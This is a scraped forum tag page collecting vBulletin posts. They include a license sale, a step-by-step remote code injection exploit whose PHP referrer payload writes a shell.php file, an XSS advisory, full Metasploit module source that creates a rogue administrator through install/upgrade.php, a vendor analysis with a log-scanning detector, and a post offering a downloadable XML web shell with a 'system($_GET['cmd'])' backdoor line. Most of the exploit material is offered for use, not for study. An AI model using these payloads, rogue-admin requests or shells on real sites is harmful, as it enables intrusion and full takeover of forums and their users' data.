Showing results for tags 'vbulletin'.
-
(did you know... RST runs on the vBulletin platform?)
(did you know... a vBulletin 4.2 license currently costs 237 EUR?)
For sale:
- vBulletin 4.x license
- download access to vBulletin 3.x as well
- Forum Runner mobile app
- price it was bought for at the time (in 2011): 210 EUR
- sale price: 21 EUR (PayPal / BTC)
-
#################################################################################################################
[+] Exploit Title: vBulletin 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability
[+] Discovered By: Dariush Nasirpour (Net.Edit0r)
[+] My Homepage: black-hg.org / nasirpour.info
[+] Date: [2015 27 February]
[+] Vendor Homepage: vBulletin.com
[+] Tested on: [vBulletin 4.2.2]
[+] Greeting : Ali Razmjoo - Ehsan Nezami - Arash Shams - Ramin Shahkar and all my friends ( #bhg )
#################################################################################################################

Remote Code Injection:
+++++++++++++++++++++++++

1) You Must Register In The vBulletin http://www.victim.com/register.php
example:[blackhat]

2) go to your user profile
example: [http://black-hg.org/cc/members/blackhat.html]

3) post something in visitor message and record post data with live http header

[example] :
message_backup=&message=For-Test-Sample&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse=

4- change message to anything "For-Test-Sample" => "ALEEEEEEEEX" [because vBulletin doesn't let you send the same comment twice in a row]

[Now post this with hackbar:]

URL: http://black-hg.org/cc/visitormessage.php?do=message

[Post data]
message_backup=&message=ALEEEEEEEEX&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse=

[And referrer data:]
PoC : http://black-hg.org/cc/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked[u can upload shell]")}}]"

5- Open hackbar and tamper it with tamper data:
referrer data has been URL encoded by browser, you have to replace this again with tamper data:
http://black-hg.org/cc/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked[you can upload shell]")}}]"
and submit request.

################################################################################################################
Source
-
Selling a vBulletin 4.x Forum license + Forum Runner Mobile App - 65 EUR or 0.3 BTC. PM for details.
-
*CVE-2014-9469 vBulletin XSS (Cross-Site Scripting) Security Vulnerabilities*

Exploit Title: vBulletin XSS (Cross-Site Scripting) Security Vulnerabilities
Product: vBulletin Forum
Vendor: vBulletin
Vulnerable Versions: 5.1.3 5.0.5 4.2.2 3.8.7 3.6.7 3.6.0 3.5.4
Tested Version: 5.1.3 4.2.2
Advisory Publication: Feb 12, 2015
Latest Update: Feb 12, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9469
CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]

*Advisory Details:*

*(1) Vendor & Product Description:*

*Vendor:* vBulletin

*Product & Version:* vBulletin Forum 5.1.3 5.0.5 4.2.2 3.8.7 3.6.7 3.6.0 3.5.4

*Vendor URL & Download:* vBulletin can be downloaded from here, https://www.vbulletin.com/purchases/

*Product Introduction:*
"vBulletin (vB) is a proprietary Internet forum software package developed by vBulletin Solutions, Inc., a division of Internet Brands. It is written in PHP and uses a MySQL database server."

"Since the initial release of the vBulletin forum product in 2000, there have been many changes and improvements. Below is a list of the major revisions and some of the changes they introduced. The current production version is 3.8.7, 4.2.2, and 5.1.3."

*(2) Vulnerability Details:*
vBulletin has a security problem. It can be exploited by XSS attacks.

*(2.1)* The vulnerability occurs at "forum/help" page. Add "hash symbol" first. Then add script at the end of it.
*References:*
http://tetraph.com/security/cves/cve-2014-9469-vbulletin-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/cve-2014-9469-vbulletin-xss-cross-site.html
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9469
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9469
https://security-tracker.debian.org/tracker/CVE-2014-9469
http://www.cvedetails.com/cve/CVE-2014-9469/
http://www.security-database.com/detail.php?alert=CVE-2014-9469
http://packetstormsecurity.com/files/cve/CVE-2014-9469
http://www.pentest.it/cve-2014-9469.html
http://www.naked-security.com/cve/CVE-2014-9469/
http://www.inzeed.com/kaleidoscope/cves/cve-2014-9469/
http://007software.net/cve-2014-9469/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/cve-2014-9469/
https://computertechhut.wordpress.com/2015/02/12/cve-2014-9469/

--
Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

Source
-
This module abuses the "install/upgrade.php" component on vBulletin 4.1+ and 4.5+ to create a new administrator account, as exploited in the wild on October 2013. This module has been tested successfully on vBulletin 4.1.5 and 4.1.0.

Module Name
auxiliary/admin/http/vbulletin_upgrade_admin

Authors
Unknown
juan vazquez <juan.vazquez [at] metasploit.com>

References
URL: https://rstforums.com/forum/76476-dangerous-vbulletin-exploit-wild.rst
URL: Dangerous vBulletin exploit in the wild
URL: Potential vBulletin Exploit (vBulletin 4.1+, vBulletin 5+) - vBulletin Community Forum

Module Options
To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':

    msf > use auxiliary/admin/http/vbulletin_upgrade_admin
    msf auxiliary(vbulletin_upgrade_admin) > show actions
    ...actions...
    msf auxiliary(vbulletin_upgrade_admin) > set ACTION <action-name>
    msf auxiliary(vbulletin_upgrade_admin) > show options
    ...show and set options...
    msf auxiliary(vbulletin_upgrade_admin) > run

Development Source Code

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # web site for more information on licensing and terms of use.
    # http://metasploit.com/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Auxiliary

      include Msf::Exploit::Remote::HttpClient
      include Msf::Auxiliary::Report

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'vBulletin Administrator Account Creation',
          'Description'    => %q{
            This module abuses the "install/upgrade.php" component on vBulletin 4.1+ and 4.5+ to
            create a new administrator account, as exploited in the wild on October 2013. This module
            has been tested successfully on vBulletin 4.1.5 and 4.1.0.
          },
          'Author'         =>
            [
              'Unknown', # Vulnerability discoverer? found in the wild
              'juan vazquez' #metasploit module
            ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
              [ 'URL', 'http://www.net-security.org/secworld.php?id=15743' ],
              [ 'URL', 'http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/3991423-potential-vbulletin-exploit-vbulletin-4-1-vbulletin-5']
            ],
          'DisclosureDate' => 'Oct 09 2013'))

        register_options(
          [
            OptString.new('TARGETURI', [ true, "The vbulletin URI", '/']),
            OptString.new('USERNAME', [true, 'The username for the new admin account', 'msf']),
            OptString.new('PASSWORD', [true, 'The password for the new admin account', 'password']),
            OptString.new('EMAIL', [true, 'The email for the new admin account', 'msf@email.loc'])
          ], self.class)
      end

      def user
        datastore["USERNAME"]
      end

      def pass
        datastore["PASSWORD"]
      end

      def run

        if user == pass
          print_error("#{peer} - Please select a password different than the username")
          return
        end

        print_status("#{peer} - Trying a new admin vBulletin account...")

        res = send_request_cgi({
          'uri'       => normalize_uri(target_uri.path, "install", "upgrade.php"),
          'method'    =>'POST',
          'vars_post' => {
            "version" => "install",
            "response" => "true",
            "checktable" => "false",
            "firstrun" => "false",
            "step" => "7",
            "startat" => "0",
            "only" => "false",
            "options[skiptemplatemerge]" => "0",
            "reponse" => "yes",
            "htmlsubmit" => "1",
            "htmldata[username]" => user,
            "htmldata[password]" => pass,
            "htmldata[confirmpassword]" => pass,
            "htmldata[email]" => datastore["EMAIL"]
          },
          'headers'   => {
            "X-Requested-With" => "XMLHttpRequest"
          }
        })

        if res and res.code == 200 and res.body =~ /Administrator account created/
          print_good("#{peer} - Admin account with credentials #{user}:#{pass} successfully created")
          report_auth_info(
            :host => rhost,
            :port => rport,
            :sname => 'http',
            :user => user,
            :pass => pass,
            :active => true,
            :proof => res.body
          )
        else
          print_error("#{peer} - Admin account creation failed")
        end
      end
    end

History
vBulletin Administrator Account Creation | Rapid7
-
vBulletin is a popular proprietary CMS that was recently reported to be vulnerable to an unspecified attack vector. vBulletin is currently positioned 4th in the list of installed CMS sites on the Internet. Hence, the threat potential is huge.

Although vBulletin has not disclosed the root cause of the vulnerability or its impact, we determined the attacker’s methods. The identified vulnerability allows an attacker to abuse the vBulletin configuration mechanism in order to create a secondary administrative account. Once the attacker creates the account, they will have full control over the exploited vBulletin application, and subsequently the supported site.

Initial analysis

Although vBulletin has not disclosed the root cause of the vulnerability or the impact on customers, they did provide a workaround in a blog post encouraging customers to delete the /install, /core/install in vBulletin 4.x and 5.x respectively. Additionally, on vBulletin internal forums a victimized user shared his server’s Apache log, providing some visibility into the attacker’s procedure:

This log indicates that the attacker continuously scans, using “GET” requests, for the “/install/upgrade.php” vulnerable resource. Once successful, indicated by the “200” response code, as opposed to the “404” response code for non-existing resources, the attacker issues a “POST” request to the same resource with the attack payload. Since the Apache logger does not log the parameters of POST requests, the details of the attack are not yet revealed.

Once we had access to some concrete technical details on the vulnerability, we were able to effectively scan hacker forums in search of an exploit code. Soon after, we found PHP code that implements the attack. Next, we carefully installed the code in our lab. The interface clearly states the goal of the attack: injecting a new admin.

In order to exploit the vulnerability and inject a new Admin user, the attacker needs to provide the following details:
- The vulnerable vBulletin upgrade.php exact URL
- The customer ID.

To get these details, the attackers created an additional auxiliary PHP script. The script scans a site for the vulnerable path, exactly as shown above in the reported Apache log, and extracts the customer ID from the vulnerable upgrade.php page, as it’s embedded within the page’s source code. Consequently, the attacker now knows both the vBulletin’s upgrade.php vulnerable URL and the customer ID. With this information, the attack can be launched.

Here is an example of the POST request with the attack payload (the red fields match the information the attacker needed to enter in the PHP interface above).

The result of the attack was exactly what the exploit package described. A new admin user was created (“eviladmin”) that is under the control of the attacker. The site has been successfully compromised.

Recommendations:

vBulletin has advised its customers to delete /install and /core/install directories in versions 4.x and 5.x respectively. For vBulletin users not able to delete these directories – it is advised to block access or redirect requests that hit upgrade.php via either a WAF or web server access configuration.

Source: Dangerous vBulletin exploit in the wild
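
The access-log pattern this analysis describes (repeated GET probes for install/upgrade.php, then a POST once a probe is answered with 200) can be searched for in existing Apache logs. The following is an added example, not code from the original post or from vBulletin; the function name, severity labels and sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict

# Apache common/combined log prefix: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# Installer paths named in the advisory: /install (4.x), /core/install (5.x).
UPGRADE_RE = re.compile(r'/(?:core/)?install/upgrade\.php(?:\?|$)', re.I)

def find_upgrade_abuse(lines):
    """Return one finding per client that requested install/upgrade.php.

    "probe"    : only GETs that did not find the installer
    "exposed"  : a GET was answered with 200, so the installer is reachable
    "critical" : a POST to the installer was answered with 200
    """
    seen = defaultdict(lambda: {"probes": 0, "exposed": set(), "posts": []})
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not UPGRADE_RE.search(m["path"]):
            continue
        path = m["path"].split("?", 1)[0]
        rec = seen[m["ip"]]
        if m["method"] == "GET":
            rec["probes"] += 1
            if m["status"] == "200":
                rec["exposed"].add(path)
        elif m["method"] == "POST" and m["status"] == "200":
            rec["posts"].append((m["ts"], path))
    findings = []
    for ip, rec in seen.items():
        sev = "critical" if rec["posts"] else "exposed" if rec["exposed"] else "probe"
        findings.append({"ip": ip, "severity": sev,
                         "probes": rec["probes"], "posts": rec["posts"]})
    return findings

# Constructed sample lines using documentation addresses (not from the page).
SAMPLE = [
    '203.0.113.7 - - [01/Jan/2024:10:01:02 +0000] "GET /forum/install/upgrade.php HTTP/1.1" 404 512 "-" "-"',
    '203.0.113.7 - - [01/Jan/2024:10:01:03 +0000] "GET /install/upgrade.php HTTP/1.1" 200 8841 "-" "-"',
    '203.0.113.7 - - [01/Jan/2024:10:01:05 +0000] "POST /install/upgrade.php HTTP/1.1" 200 301 "-" "-"',
    '198.51.100.9 - - [01/Jan/2024:11:00:00 +0000] "GET /core/install/upgrade.php HTTP/1.1" 404 512 "-" "-"',
    '192.0.2.44 - - [01/Jan/2024:11:05:00 +0000] "GET /index.php HTTP/1.1" 200 9000 "-" "-"',
]

if __name__ == "__main__":
    for finding in find_upgrade_abuse(SAMPLE):
        print(finding)
```

A "critical" finding means the admin user table should be reviewed for accounts created around the logged timestamp; an "exposed" finding means the install directory is still reachable and should be deleted or blocked as recommended above.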
-
By TinKode

Why did I create this (XML) Shell for vBulletin?! Hmm, because it's easier to use and works on all versions from 3.X to 4.X. I removed all PHP code, because vB 4.X has restricted these tags.

The old method, editing a file like ajax.php to get RCE [Remote Command Execution] by adding code to the source like <?php system($_GET['cmd']);?> and executing it like http://website.com/ajax.php?cmd=[RCE], now doesn't work on the 4.X versions!

Instructions:
Step 1: Enter AdminCP -> Styles & Templates section and choose Download / Upload Styles.
Step 2: Click on the Browse button and search for insecurity.xml, then select [Yes] Ignore Style Version, then click Import.
Step 3: After you have uploaded the .XML Style, you can access it by clicking on the style like in the example.

Downloads:
Mirror: http://pastebin.com/ybZqXiDH
Mirror: http://www.megaupload.com/?d=5DELFLQ3
Password: ISR